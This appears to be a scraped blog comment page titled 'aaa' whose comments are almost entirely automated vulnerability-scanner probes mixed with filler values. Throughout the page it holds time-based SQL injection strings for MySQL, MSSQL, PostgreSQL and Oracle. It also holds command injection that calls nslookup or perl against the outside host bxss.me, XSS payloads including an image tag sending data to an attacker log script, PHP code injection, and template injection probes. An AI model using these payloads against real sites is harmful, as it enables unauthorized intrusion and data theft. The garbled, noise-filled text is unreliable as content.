&(nslookup hittzmtwbqxbf33ae7.bxss.me||perl -e “gethostbyname(‘hittzmtwbqxbf33ae7.bxss.me’)”)&’\”`0&(nslookup hittzmtwbqxbf33ae7.bxss.me||perl -e “gethostbyname(‘hittzmtwbqxbf33ae7.bxss.me’)”)&`’ Responder
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/ Responder
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/ Responder
253 thoughts on “aaa”
1
yCK0IM8H
1*391*386*0
1/1
1*1
555
555
555
555
555
-1; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
zvFRyzCr’); waitfor delay ‘0:0:15’ —
p0NONbBL’)); waitfor delay ‘0:0:15’ —
-5 OR 688=(SELECT 688 FROM PG_SLEEP(15))–
555
555
-5) OR 448=(SELECT 448 FROM PG_SLEEP(15))–
555
555
555
mabF7Fdc’) OR 962=(SELECT 962 FROM PG_SLEEP(15))–
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
1
555
1
1
1
1
gKva22or
1*555
555*450*445*0
555*732*727*0
-1 OR 2+815-815-1=0+0+0+1
1
1
1
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
1
1
1
1
rE1TR1ft’)); waitfor delay ‘0:0:15’ —
-5 OR 50=(SELECT 50 FROM PG_SLEEP(15))–
-5) OR 507=(SELECT 507 FROM PG_SLEEP(15))–
-1)) OR 989=(SELECT 989 FROM PG_SLEEP(15))–
0wKmqCJA’) OR 82=(SELECT 82 FROM PG_SLEEP(15))–
hCG7HqFK’)) OR 103=(SELECT 103 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
response.write(9386762*9146889)
1
555
555
555
555
1*1
1*25*20*0
(31-25-5)
(824-818-5)
555
1′”
@@mDvxZ
1
1
1
555
555
555
IF0Je2AN
1*555
555*388*383*0
555*420*415*0
-1 OR 3+33-33-1=0+0+0+1
1%2527%2522
1
1
1
1
1
&(nslookup hittzmtwbqxbf33ae7.bxss.me||perl -e “gethostbyname(‘hittzmtwbqxbf33ae7.bxss.me’)”)&’\”`0&(nslookup hittzmtwbqxbf33ae7.bxss.me||perl -e “gethostbyname(‘hittzmtwbqxbf33ae7.bxss.me’)”)&`’
12345′”\’\”);|]*%00{%0d%0a%bf%27’💡
1
1
1
1some_inexistent_file_with_long_name%00.jpg
1&n966277=v959139
1
1
“;print(md5(31337));$a=”
bxss.me/t/xss.html?%00
1
1
1
1
1′”()&%WK75(9317)
<!–
‘”()&%WK75(9189)
1
tKrwF8BS
1*1
1*254*249*0
(260-254-5)
1
555
-1 OR 2+280-280-1=0+0+0+1
555
555
-1 OR 3*2>(0+5+280-280)
-1 OR 2+1-1-1=1 AND 280=280
555
555
555
555
555
555
555
555&n923939=v918399
555
!(()&&!|*|*|
555
555
http://bxss.me/t/xss.html?%00
555
‘;print(md5(31337));$a=’
http://bxss.me/t/fit.txt?.jpg
wp-comments-post.php
/xfs.bxss.me
‘.print(md5(31337)).’
555
555
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
‘”()&%HrWu(9351)
5559989118
555
<th:t="${acx}#foreach
1}}”}}’}}1%>”%>’%>
-1; waitfor delay ‘0:0:15’ —
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
“acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
555HrWu(9387)
-1); waitfor delay ‘0:0:15’ —
555HrWu(9658)
555HrWu(9532)
-1)); waitfor delay ‘0:0:15’ —
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%48%72%57%75%289310%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\HrWu(9976)\u003C/sCripT\u003E
555<ScRiPt>HrWu(9818)</sCripT>
555
555}body{acu:Expre/**/SSion(HrWu(9611))}
555FKyIo
HrWu(9314)
555LC8YQ[!+!]
555<img sRc='http://attacker-9021/log.php?
555<aI8mRD7<
555
qDwc778W’); waitfor delay ‘0:0:15’ —
555
555
555
555
555
iPioJIYL
1*555
(861-301-5)
-1 OR 2+777-777-1=0+0+0+1
-1 OR 3*2<(0+5+777-777)
if(now()=sysdate(),sleep(15),0)
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
1%2527%2522
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1
1
1
1
1
1
1
1 waitfor delay ‘0:0:15’ —
1
OYguE3Sp’; waitfor delay ‘0:0:15’ —
1
P9kZ7Run’); waitfor delay ‘0:0:15’ —
1
Spe7g1wC’)); waitfor delay ‘0:0:15’ —
1
-5 OR 518=(SELECT 518 FROM PG_SLEEP(15))–
1
-5) OR 907=(SELECT 907 FROM PG_SLEEP(15))–
1
-1)) OR 930=(SELECT 930 FROM PG_SLEEP(15))–
1
j0pSuIg8′ OR 620=(SELECT 620 FROM PG_SLEEP(15))–
1
rBhCXstc’) OR 255=(SELECT 255 FROM PG_SLEEP(15))–
1
lpa4ePPf’)) OR 629=(SELECT 629 FROM PG_SLEEP(15))–
1
1
1
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
@@DcOBZ
1
555
555
555
555
555
555
555
555
555
555
zB7v0XIJ
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
555
-1); waitfor delay ‘0:0:15’ —
555
-1)); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
555
qXVfs4pg’; waitfor delay ‘0:0:15’ —
555
555
T9vUskmT’ OR 738=(SELECT 738 FROM PG_SLEEP(15))–
v5b8ox6u’) OR 671=(SELECT 671 FROM PG_SLEEP(15))–
GmAUVJhB
1*555
-1 OR 3+528-528-1=0+0+0+1
1%2527%2522
1′”
@@LUs5Z